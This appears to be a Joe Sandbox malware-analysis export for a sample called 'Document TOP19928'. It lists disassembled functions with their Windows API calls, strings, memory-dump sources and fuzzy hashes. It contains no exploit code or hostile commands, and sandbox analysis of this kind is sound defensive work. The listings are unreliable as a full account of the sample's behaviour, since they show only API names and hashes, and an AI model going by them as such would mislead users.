Function 0083AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0083AF13
__swprintf.LIBCMT ref: 0083AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0085F910), ref: 0083AF6A

Strings

%lu, xrefs: 0083AF26

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: b1143e3aa7740958d161a0ab8182e8d993048bfb24f533f10ca1220df4e2af46
Instruction ID: 4bf8dc313fbfcba21a8a0956e471c3a2eb169c15edae3af35d33c82da3cd404a
Opcode Fuzzy Hash: b1143e3aa7740958d161a0ab8182e8d993048bfb24f533f10ca1220df4e2af46
Instruction Fuzzy Hash: A5213270600209AFCB10EF54C985DAE7BB8FF89714B104069F905EB352DB75EA45CB61

Function 0082A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Part of subcall function 0082A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0082A399
Part of subcall function 0082A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0082A3AC
Part of subcall function 0082A37C: GetCurrentThreadId.KERNEL32 ref: 0082A3B3
Part of subcall function 0082A37C: AttachThreadInput.USER32(00000000), ref: 0082A3BA

GetFocus.USER32 ref: 0082A554

Part of subcall function 0082A3C5: GetParent.USER32(?), ref: 0082A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0082A59D
EnumChildWindows.USER32(?,0082A615), ref: 0082A5C5
__swprintf.LIBCMT ref: 0082A5DF

Strings

%s%d, xrefs: 0082A5D9

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 7750f7b2bd92e33c38829c566bc7ea44935d6f59f9ddbb71b81d24ec40d30f24
Instruction ID: c0c14e0993da69e2fc4a720f24aaaf8c34bbb50641ec5ae6226422b01802f4e1
Opcode Fuzzy Hash: 7750f7b2bd92e33c38829c566bc7ea44935d6f59f9ddbb71b81d24ec40d30f24
Instruction Fuzzy Hash: E6119371200218BBDF14BF64EC89FAA37B9FF48701F044075BA18EA252DA7459858B76

Function 00832017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00832048

Strings

APPEND, xrefs: 00832081
KEYS, xrefs: 0083205F
REMOVE, xrefs: 0083204E
EXISTS, xrefs: 00832070

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 8bf28a0812b618ed714576cf7def1be92d327de0402a6ee48eb33732c4cfb4f1
Instruction ID: 8e93d9cdee91b4d3d15caf28380b836ac2117a2fc452ad761c5d376df141d64c
Opcode Fuzzy Hash: 8bf28a0812b618ed714576cf7def1be92d327de0402a6ee48eb33732c4cfb4f1
Instruction Fuzzy Hash: FF113934900109CFCF18EFA4D9954BEB7B4FF56304F108469D956A73A2EB36690ACB90

Function 00848F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0085F910), ref: 0084903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0085F910), ref: 00849071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008491EB
SysFreeString.OLEAUT32(?), ref: 00849215

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 6dfb62bc590c052197d57427e05e1816259295cb075921195247637566eff767
Instruction ID: c5eac3007fc6b57158d0ceb10c3d4ba66783cea3cd0fc4336f646f76218306df
Opcode Fuzzy Hash: 6dfb62bc590c052197d57427e05e1816259295cb075921195247637566eff767
Instruction Fuzzy Hash: 63F13571A00209EFCB14DF94C888EAEB7B9FF49315F108099F956EB291DB35AE45CB50

Function 0084EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0084EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0084EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0084F07E
CloseHandle.KERNEL32(?), ref: 0084F0FF

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a6bd5999a1a2fe308db0b56b8254a4a30a67cbec52097fd55565862769b2d068
Instruction ID: adcc029fb963b04b8a4c6260b8bf6a5e76ba8c2464fd9020fae620c54d3c3fbe
Opcode Fuzzy Hash: a6bd5999a1a2fe308db0b56b8254a4a30a67cbec52097fd55565862769b2d068
Instruction Fuzzy Hash: 31812D716047119FD720EF28C846B6AB7E5FF88710F14881EF699DB392DB75AC408B52

Function 008502C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 008510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008503C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0085040E
RegCloseKey.ADVAPI32(?,?), ref: 0085043A
RegCloseKey.ADVAPI32(00000000), ref: 00850447

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 322b8563aaee3877a4a68dc9cf4751603ac88250df33958b3021e3c67a8fc993
Instruction ID: 1f76a21ebf954647d0b2b6c59a01a6adcbf8b2e2cef1551d69ed31137ee7af49
Opcode Fuzzy Hash: 322b8563aaee3877a4a68dc9cf4751603ac88250df33958b3021e3c67a8fc993
Instruction Fuzzy Hash: 25513A31208204EFD704EF54D885E6EB7E8FF84319F04892EB99587292EB34E908CB52

Function 0084DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 0084DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 0084DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 0084DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DD35

Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837B20,?,?,00000000), ref: 007D5B8C
Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837B20,?,?,00000000,?,?), ref: 007D5BB0

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: ef8e4a424604b08ac3192a4d570c337c7883d1332746834e4a6bfebc6e2f845a
Instruction ID: 596e4178bd553646b9ae3bce03d8d31a6fd15f2eb0a075280ce8520b58f39290
Opcode Fuzzy Hash: ef8e4a424604b08ac3192a4d570c337c7883d1332746834e4a6bfebc6e2f845a
Instruction Fuzzy Hash: 0F511875A00609DFCB00EF68C488DADB7F4FF58314B14C06AE919AB312DB38AD45CB91

Function 0083E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0083E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0083E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0083E8F2

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0083E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0083E91F

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 72f8d69822122bc1bbb6d0e3035830a1ef1551564508b27eeac6c3168a90e5fe
Instruction ID: 84e19cdb849db0dabd664b245caed4d354bc9db2d2dffc9ab80c64096fbe6cd8
Opcode Fuzzy Hash: 72f8d69822122bc1bbb6d0e3035830a1ef1551564508b27eeac6c3168a90e5fe
Instruction Fuzzy Hash: 18511A35A00215EFCB01EF64C985AAEBBF5FF48310F1480A9E949AB362CB35AD51DB50

Function 0085A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0a375b695d653ece7dc1fcf287c0cf72f5afa626f963206dc3d4d0f594ec0f
Instruction ID: a73b496adfee4698420880df8b0ed0f2dbfb8cf56eebc8a9f1bc7548907d0736
Opcode Fuzzy Hash: ab0a375b695d653ece7dc1fcf287c0cf72f5afa626f963206dc3d4d0f594ec0f
Instruction Fuzzy Hash: AE41D235900208ABC718DB68CC88FE9BBA8FB09356F140265FD55E72E1D770AE49DA51

Function 007D2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007D2357
ScreenToClient.USER32(008967B0,?), ref: 007D2374
GetAsyncKeyState.USER32(00000001), ref: 007D2399
GetAsyncKeyState.USER32(00000002), ref: 007D23A7

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 6d74392c5230de215ff5c0b8b12921977a26e06409e42fbf81c470588f0c2ed5
Instruction ID: ad8d533986d2c416f57fbe871a08b02e8ac66bad483613561812e056431ab4a5
Opcode Fuzzy Hash: 6d74392c5230de215ff5c0b8b12921977a26e06409e42fbf81c470588f0c2ed5
Instruction Fuzzy Hash: E841AE31504219FBCF159F68CC44AEDBB74FB15360F20435AF828D22E1C738A995DB91

Function 00826920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082695D
TranslateAcceleratorW.USER32(?,?,?), ref: 008269A9
TranslateMessage.USER32(?), ref: 008269D2
DispatchMessageW.USER32(?), ref: 008269DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008269EB

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 873165542e68e5f84427a07ee7d600bcf08a981267a6cfd9ddef476ef90d5d3e
Instruction ID: b0e3b995205e50a7ec5a98f64292b2c1907c535e170dd64bbca70bb06d65ae34
Opcode Fuzzy Hash: 873165542e68e5f84427a07ee7d600bcf08a981267a6cfd9ddef476ef90d5d3e
Instruction Fuzzy Hash: AB318271900266ABDB20DFB4AC84BB67BA8FB11304F184166E522D31A1FB7598E5DB90

Function 00828F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00828F12
PostMessageW.USER32(?,00000201,00000001), ref: 00828FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00828FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00828FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00828FDA

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
Instruction ID: 685e491676ca3dae8f96360654cacbbeca39b439cd3ec07c26dd055693d4452e
Opcode Fuzzy Hash: f50f35d80366f0565f285728f18c9c028300fa725dd61dcbef8dfda58d65f623
Instruction Fuzzy Hash: F931EE71501229EFDF00CF68EA4CA9E7BB6FB04316F104229FA24EB1D1CBB09954CB90

Function 0082B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0082B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0082B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0082B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0082B742
_wcsstr.LIBCMT ref: 0082B74C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 2b7e052db2b1569768e82f11ff60426e3b46e04b23f57f86fe01070958e0c05a
Instruction ID: 6ffbb40db8c904b14c748d1b848aa099661704af24b76310ffc31e91cfb015f3
Opcode Fuzzy Hash: 2b7e052db2b1569768e82f11ff60426e3b46e04b23f57f86fe01070958e0c05a
Instruction Fuzzy Hash: 37210A71205258FFEB155B39AC49E7B7BE8EF55711F004039F905CA2A2EF65DC809250

Function 0085B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623

GetWindowLongW.USER32(?,000000F0), ref: 0085B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0085B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0085B489
GetSystemMetrics.USER32(00000004), ref: 0085B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00841184,00000000), ref: 0085B4D0

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 19a529ab75753c5af9549a079fe94be49cad4cd888b7a96cab59a2062e19a50c
Instruction ID: af25ee9affba670221ad8b72a2e41eae3fc04f582c1b2e4809372f5376a291ba
Opcode Fuzzy Hash: 19a529ab75753c5af9549a079fe94be49cad4cd888b7a96cab59a2062e19a50c
Instruction Fuzzy Hash: 9021E231A10255AFCB209F38CC08A6A3BA4FB14726F154779FD26D31E2E7309C24DB84

Function 008297E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00829802

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829834
__itow.LIBCMT ref: 0082984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00829874
__itow.LIBCMT ref: 00829885

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 06a5d2c1370fab57caf1a695a8a6c32d53c70a405fc219bf2bf9f5d15ab0a2cc
Instruction ID: 3a972af6b3ebe175ef037b88bc23932231b6413bae098fbcd6f4d459d7623edd
Opcode Fuzzy Hash: 06a5d2c1370fab57caf1a695a8a6c32d53c70a405fc219bf2bf9f5d15ab0a2cc
Instruction Fuzzy Hash: 36210A71B00218ABDB10AA659C8AEEE3BF9FF59710F080035FE44EB341E6748D81C791

